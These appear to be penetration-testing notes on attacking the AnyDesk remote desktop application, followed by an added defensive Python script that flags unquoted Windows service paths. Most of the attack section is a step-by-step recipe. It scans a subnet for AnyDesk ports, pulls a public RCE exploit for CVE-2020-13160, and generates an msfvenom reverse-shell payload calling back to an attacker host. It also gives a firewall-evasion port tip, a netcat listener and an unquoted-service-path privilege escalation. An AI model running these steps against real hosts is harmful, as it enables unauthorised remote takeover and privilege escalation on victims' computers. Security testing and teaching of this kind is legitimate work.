AnyDesk is a proprietary remote desktop application distributed by AnyDesk Software GmbH that provides platform-independent remote access to personal computers and other devices running the host application.
AnyDesk is frequently used by scammers. It offers remote control, file transfer, and VPN functionality.
Nmap sweep for AnyDesk
IP=x.x.x.1-254
sudo nmap -Pn -sT -sC -sV -p 7070 -T5 --open $IP
sudo nmap -Pn -sU -sC -sV -p 50001 -T5 --open $IP
Exploits
searchsploit anydesk
AnyDesk 5.5.2 – Remote Code Execution (CVE-2020-13160)
searchsploit -m 49613
Generate the shellcode
Depending on firewall rules, you might need to use a port that is allowed, such as 7070 (allowed for AnyDesk), instead of 4444 as suggested in the exploit.
msfvenom -p linux/x64/shell_reverse_tcp LHOST=$KALI_IP LPORT=4444 -b "\x00\x25\x26" -f python -v shellcode
- Edit the IP address to the victim host. Leave port 50001 unchanged, as it is the default UDP port for AnyDesk.
- Replace the shellcode in the exploit with the generated shellcode.
Start a listener
nc -nlvp 4444
Execute the exploit
./49613.py
Should get a shell within 5 seconds according to the exploit.
Privilege Escalation (Windows)
sc query AnyDesk
sc qc anydesk
C:\Program Files (x86)\AnyDesk\AnyDesk.exe
Not tested, but the only option seems to be:
C:\Program.exe
See Windows Unquoted Service Path. Could require a reboot if the service cannot be restarted.
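
A defender-side check for the unquoted service path condition noted above, as an added example that is not part of the original notes: it parses `sc qc` output and reports services whose executable path is unquoted and contains a space, together with the quoted form that removes the ambiguity. The sample output is constructed (only the AnyDesk path comes from the page), and the function names are illustrative.

```python
import re

# Constructed `sc qc` output; only the AnyDesk path is taken from the page.
SAMPLE_SC_QC = r'''
SERVICE_NAME: AnyDesk
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : C:\Program Files (x86)\AnyDesk\AnyDesk.exe
SERVICE_NAME: ExampleQuoted
        BINARY_PATH_NAME   : "C:\Program Files\Example\svc.exe" --run
SERVICE_NAME: ExampleNoSpace
        BINARY_PATH_NAME   : C:\Windows\System32\svchost.exe -k netsvcs
SERVICE_NAME: ExampleUnquotedArgs
        BINARY_PATH_NAME   : C:\Program Files\Example Tool\agent.exe --service
'''

# End of the executable in an unquoted value: first ".exe" followed by space or end.
EXE_END = re.compile(r"\.exe(?=\s|$)", re.IGNORECASE)

def split_image_path(value):
    """Return (executable, arguments, was_quoted) for a BINARY_PATH_NAME value."""
    value = value.strip()
    if value.startswith('"'):
        exe, _, rest = value[1:].partition('"')
        return exe, rest.strip(), True
    match = EXE_END.search(value)
    if match is None:  # no .exe boundary (e.g. a driver path): keep the value whole
        return value, "", False
    return value[:match.end()], value[match.end():].strip(), False

def audit(sc_qc_text):
    """List services whose executable path is unquoted and contains a space."""
    findings, service = [], None
    for line in sc_qc_text.splitlines():
        key, _, value = line.partition(":")
        key = key.strip()
        if key == "SERVICE_NAME":
            service = value.strip()
        elif key == "BINARY_PATH_NAME":
            exe, args, quoted = split_image_path(value)
            if not quoted and " " in exe:
                fixed = f'"{exe}"' + (f" {args}" if args else "")
                findings.append({"service": service, "path": exe, "quoted_form": fixed})
    return findings

if __name__ == "__main__":
    for finding in audit(SAMPLE_SC_QC):
        print(f"{finding['service']}: unquoted -> set to {finding['quoted_form']}")
```

On a host, pass it the text printed by `sc qc` for each service; the quoted form is the value the service's binary path should be changed to.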